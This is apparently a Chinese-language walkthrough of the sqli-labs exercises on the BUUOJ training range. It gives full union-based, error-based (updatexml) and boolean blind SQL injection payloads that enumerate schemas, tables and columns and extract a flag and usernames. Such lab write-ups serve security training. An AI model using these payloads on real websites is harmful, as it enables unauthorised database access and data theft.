靶场：https://buuoj.cn/challenges 的sqli-labs

联合查询注入

L1:首先看有什么数据库

select group_concat(schema_name) from information_schema.schemata

完整url:

http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(schema_name) from information_schema.schemata
)'

选择“ctftraining”数据库

http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(table_name) from information_schema.tables where table_schema="ctftraining"
)'

选择名为flag的table

http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(column_name) from information_schema.columns where table_schema="ctftraining" and table_name='flag'
)'

查询内容

?id=-1' union select 1,2,(
select flag from ctftraining.flag
)'

报错查询注入

采用报错注入步骤是类似的，最后flag显示不全

?id=1111+and+updatexml(1,concat(0x7e,(
select flag from ctftraining.flag
),0x7e),1); --+

http://d7275205-467b-4f6c-97e6-4669e55b54e9.node4.buuoj.cn/Less-2/?id=1111+and+updatexml(1,concat(0x7e,(
substr((select flag from ctftraining.flag),16)
),0x7e),1); --+

布尔盲注

先练习下不跨库的
获取长度

?id=1' and length(database())=8 %23

获取数据库名字

?id=1' and left(database(),1)='s' %23

获取表名

?id=1' and left( (select group_concat(table_name) from information_schema.tables where table_schema=database()) ,1)='u' %23

获取列名

 ?id=1' and left( (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users') ,1)='u' %23

获取数据

http://c370bae3-f008-47ee-9890-d14960b1e5ce.node4.buuoj.cn/Less-8/?id=1' and left(
(select group_concat(username) from users)
,1)='u' %23